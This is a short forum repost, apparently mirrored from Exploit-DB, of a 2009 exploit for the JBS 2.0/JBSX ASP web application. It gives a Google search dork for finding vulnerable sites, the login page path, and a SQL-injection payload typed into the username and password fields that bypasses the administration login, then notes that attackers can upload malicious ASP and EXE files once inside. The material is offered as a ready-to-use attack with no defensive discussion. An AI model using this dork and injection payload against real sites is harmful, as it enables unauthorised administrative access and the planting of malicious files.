Exploit JBS 2.0 / JBSX - Administration Panel Bypass / Arbitrary File Upload

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10161
Проверка EDB
  1. Пройдено
Автор
BLACKENEDSECURITY
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
N/A
Дата публикации
2009-11-17
Код:
# Administration panel bypass and Malicious File Upload Vulnerability
# JBS v2.0 JBSX and other Jiro's Products
# Google Dork: "inurl:/files/redirect.asp"


Go to url files/login.asp

admin 'or' '='    
password 'or' '='

H4ckers may upload malicious files by using upload panel as they have administrator acces
they are able to change settings and upload asp and exe files.


# Bug discovered by blackenedsecurity
# http://blackenedsecurity.blogcu.com
# msn: [email protected]
# From Turkey =)
 
Источник
www.exploit-db.com

Похожие темы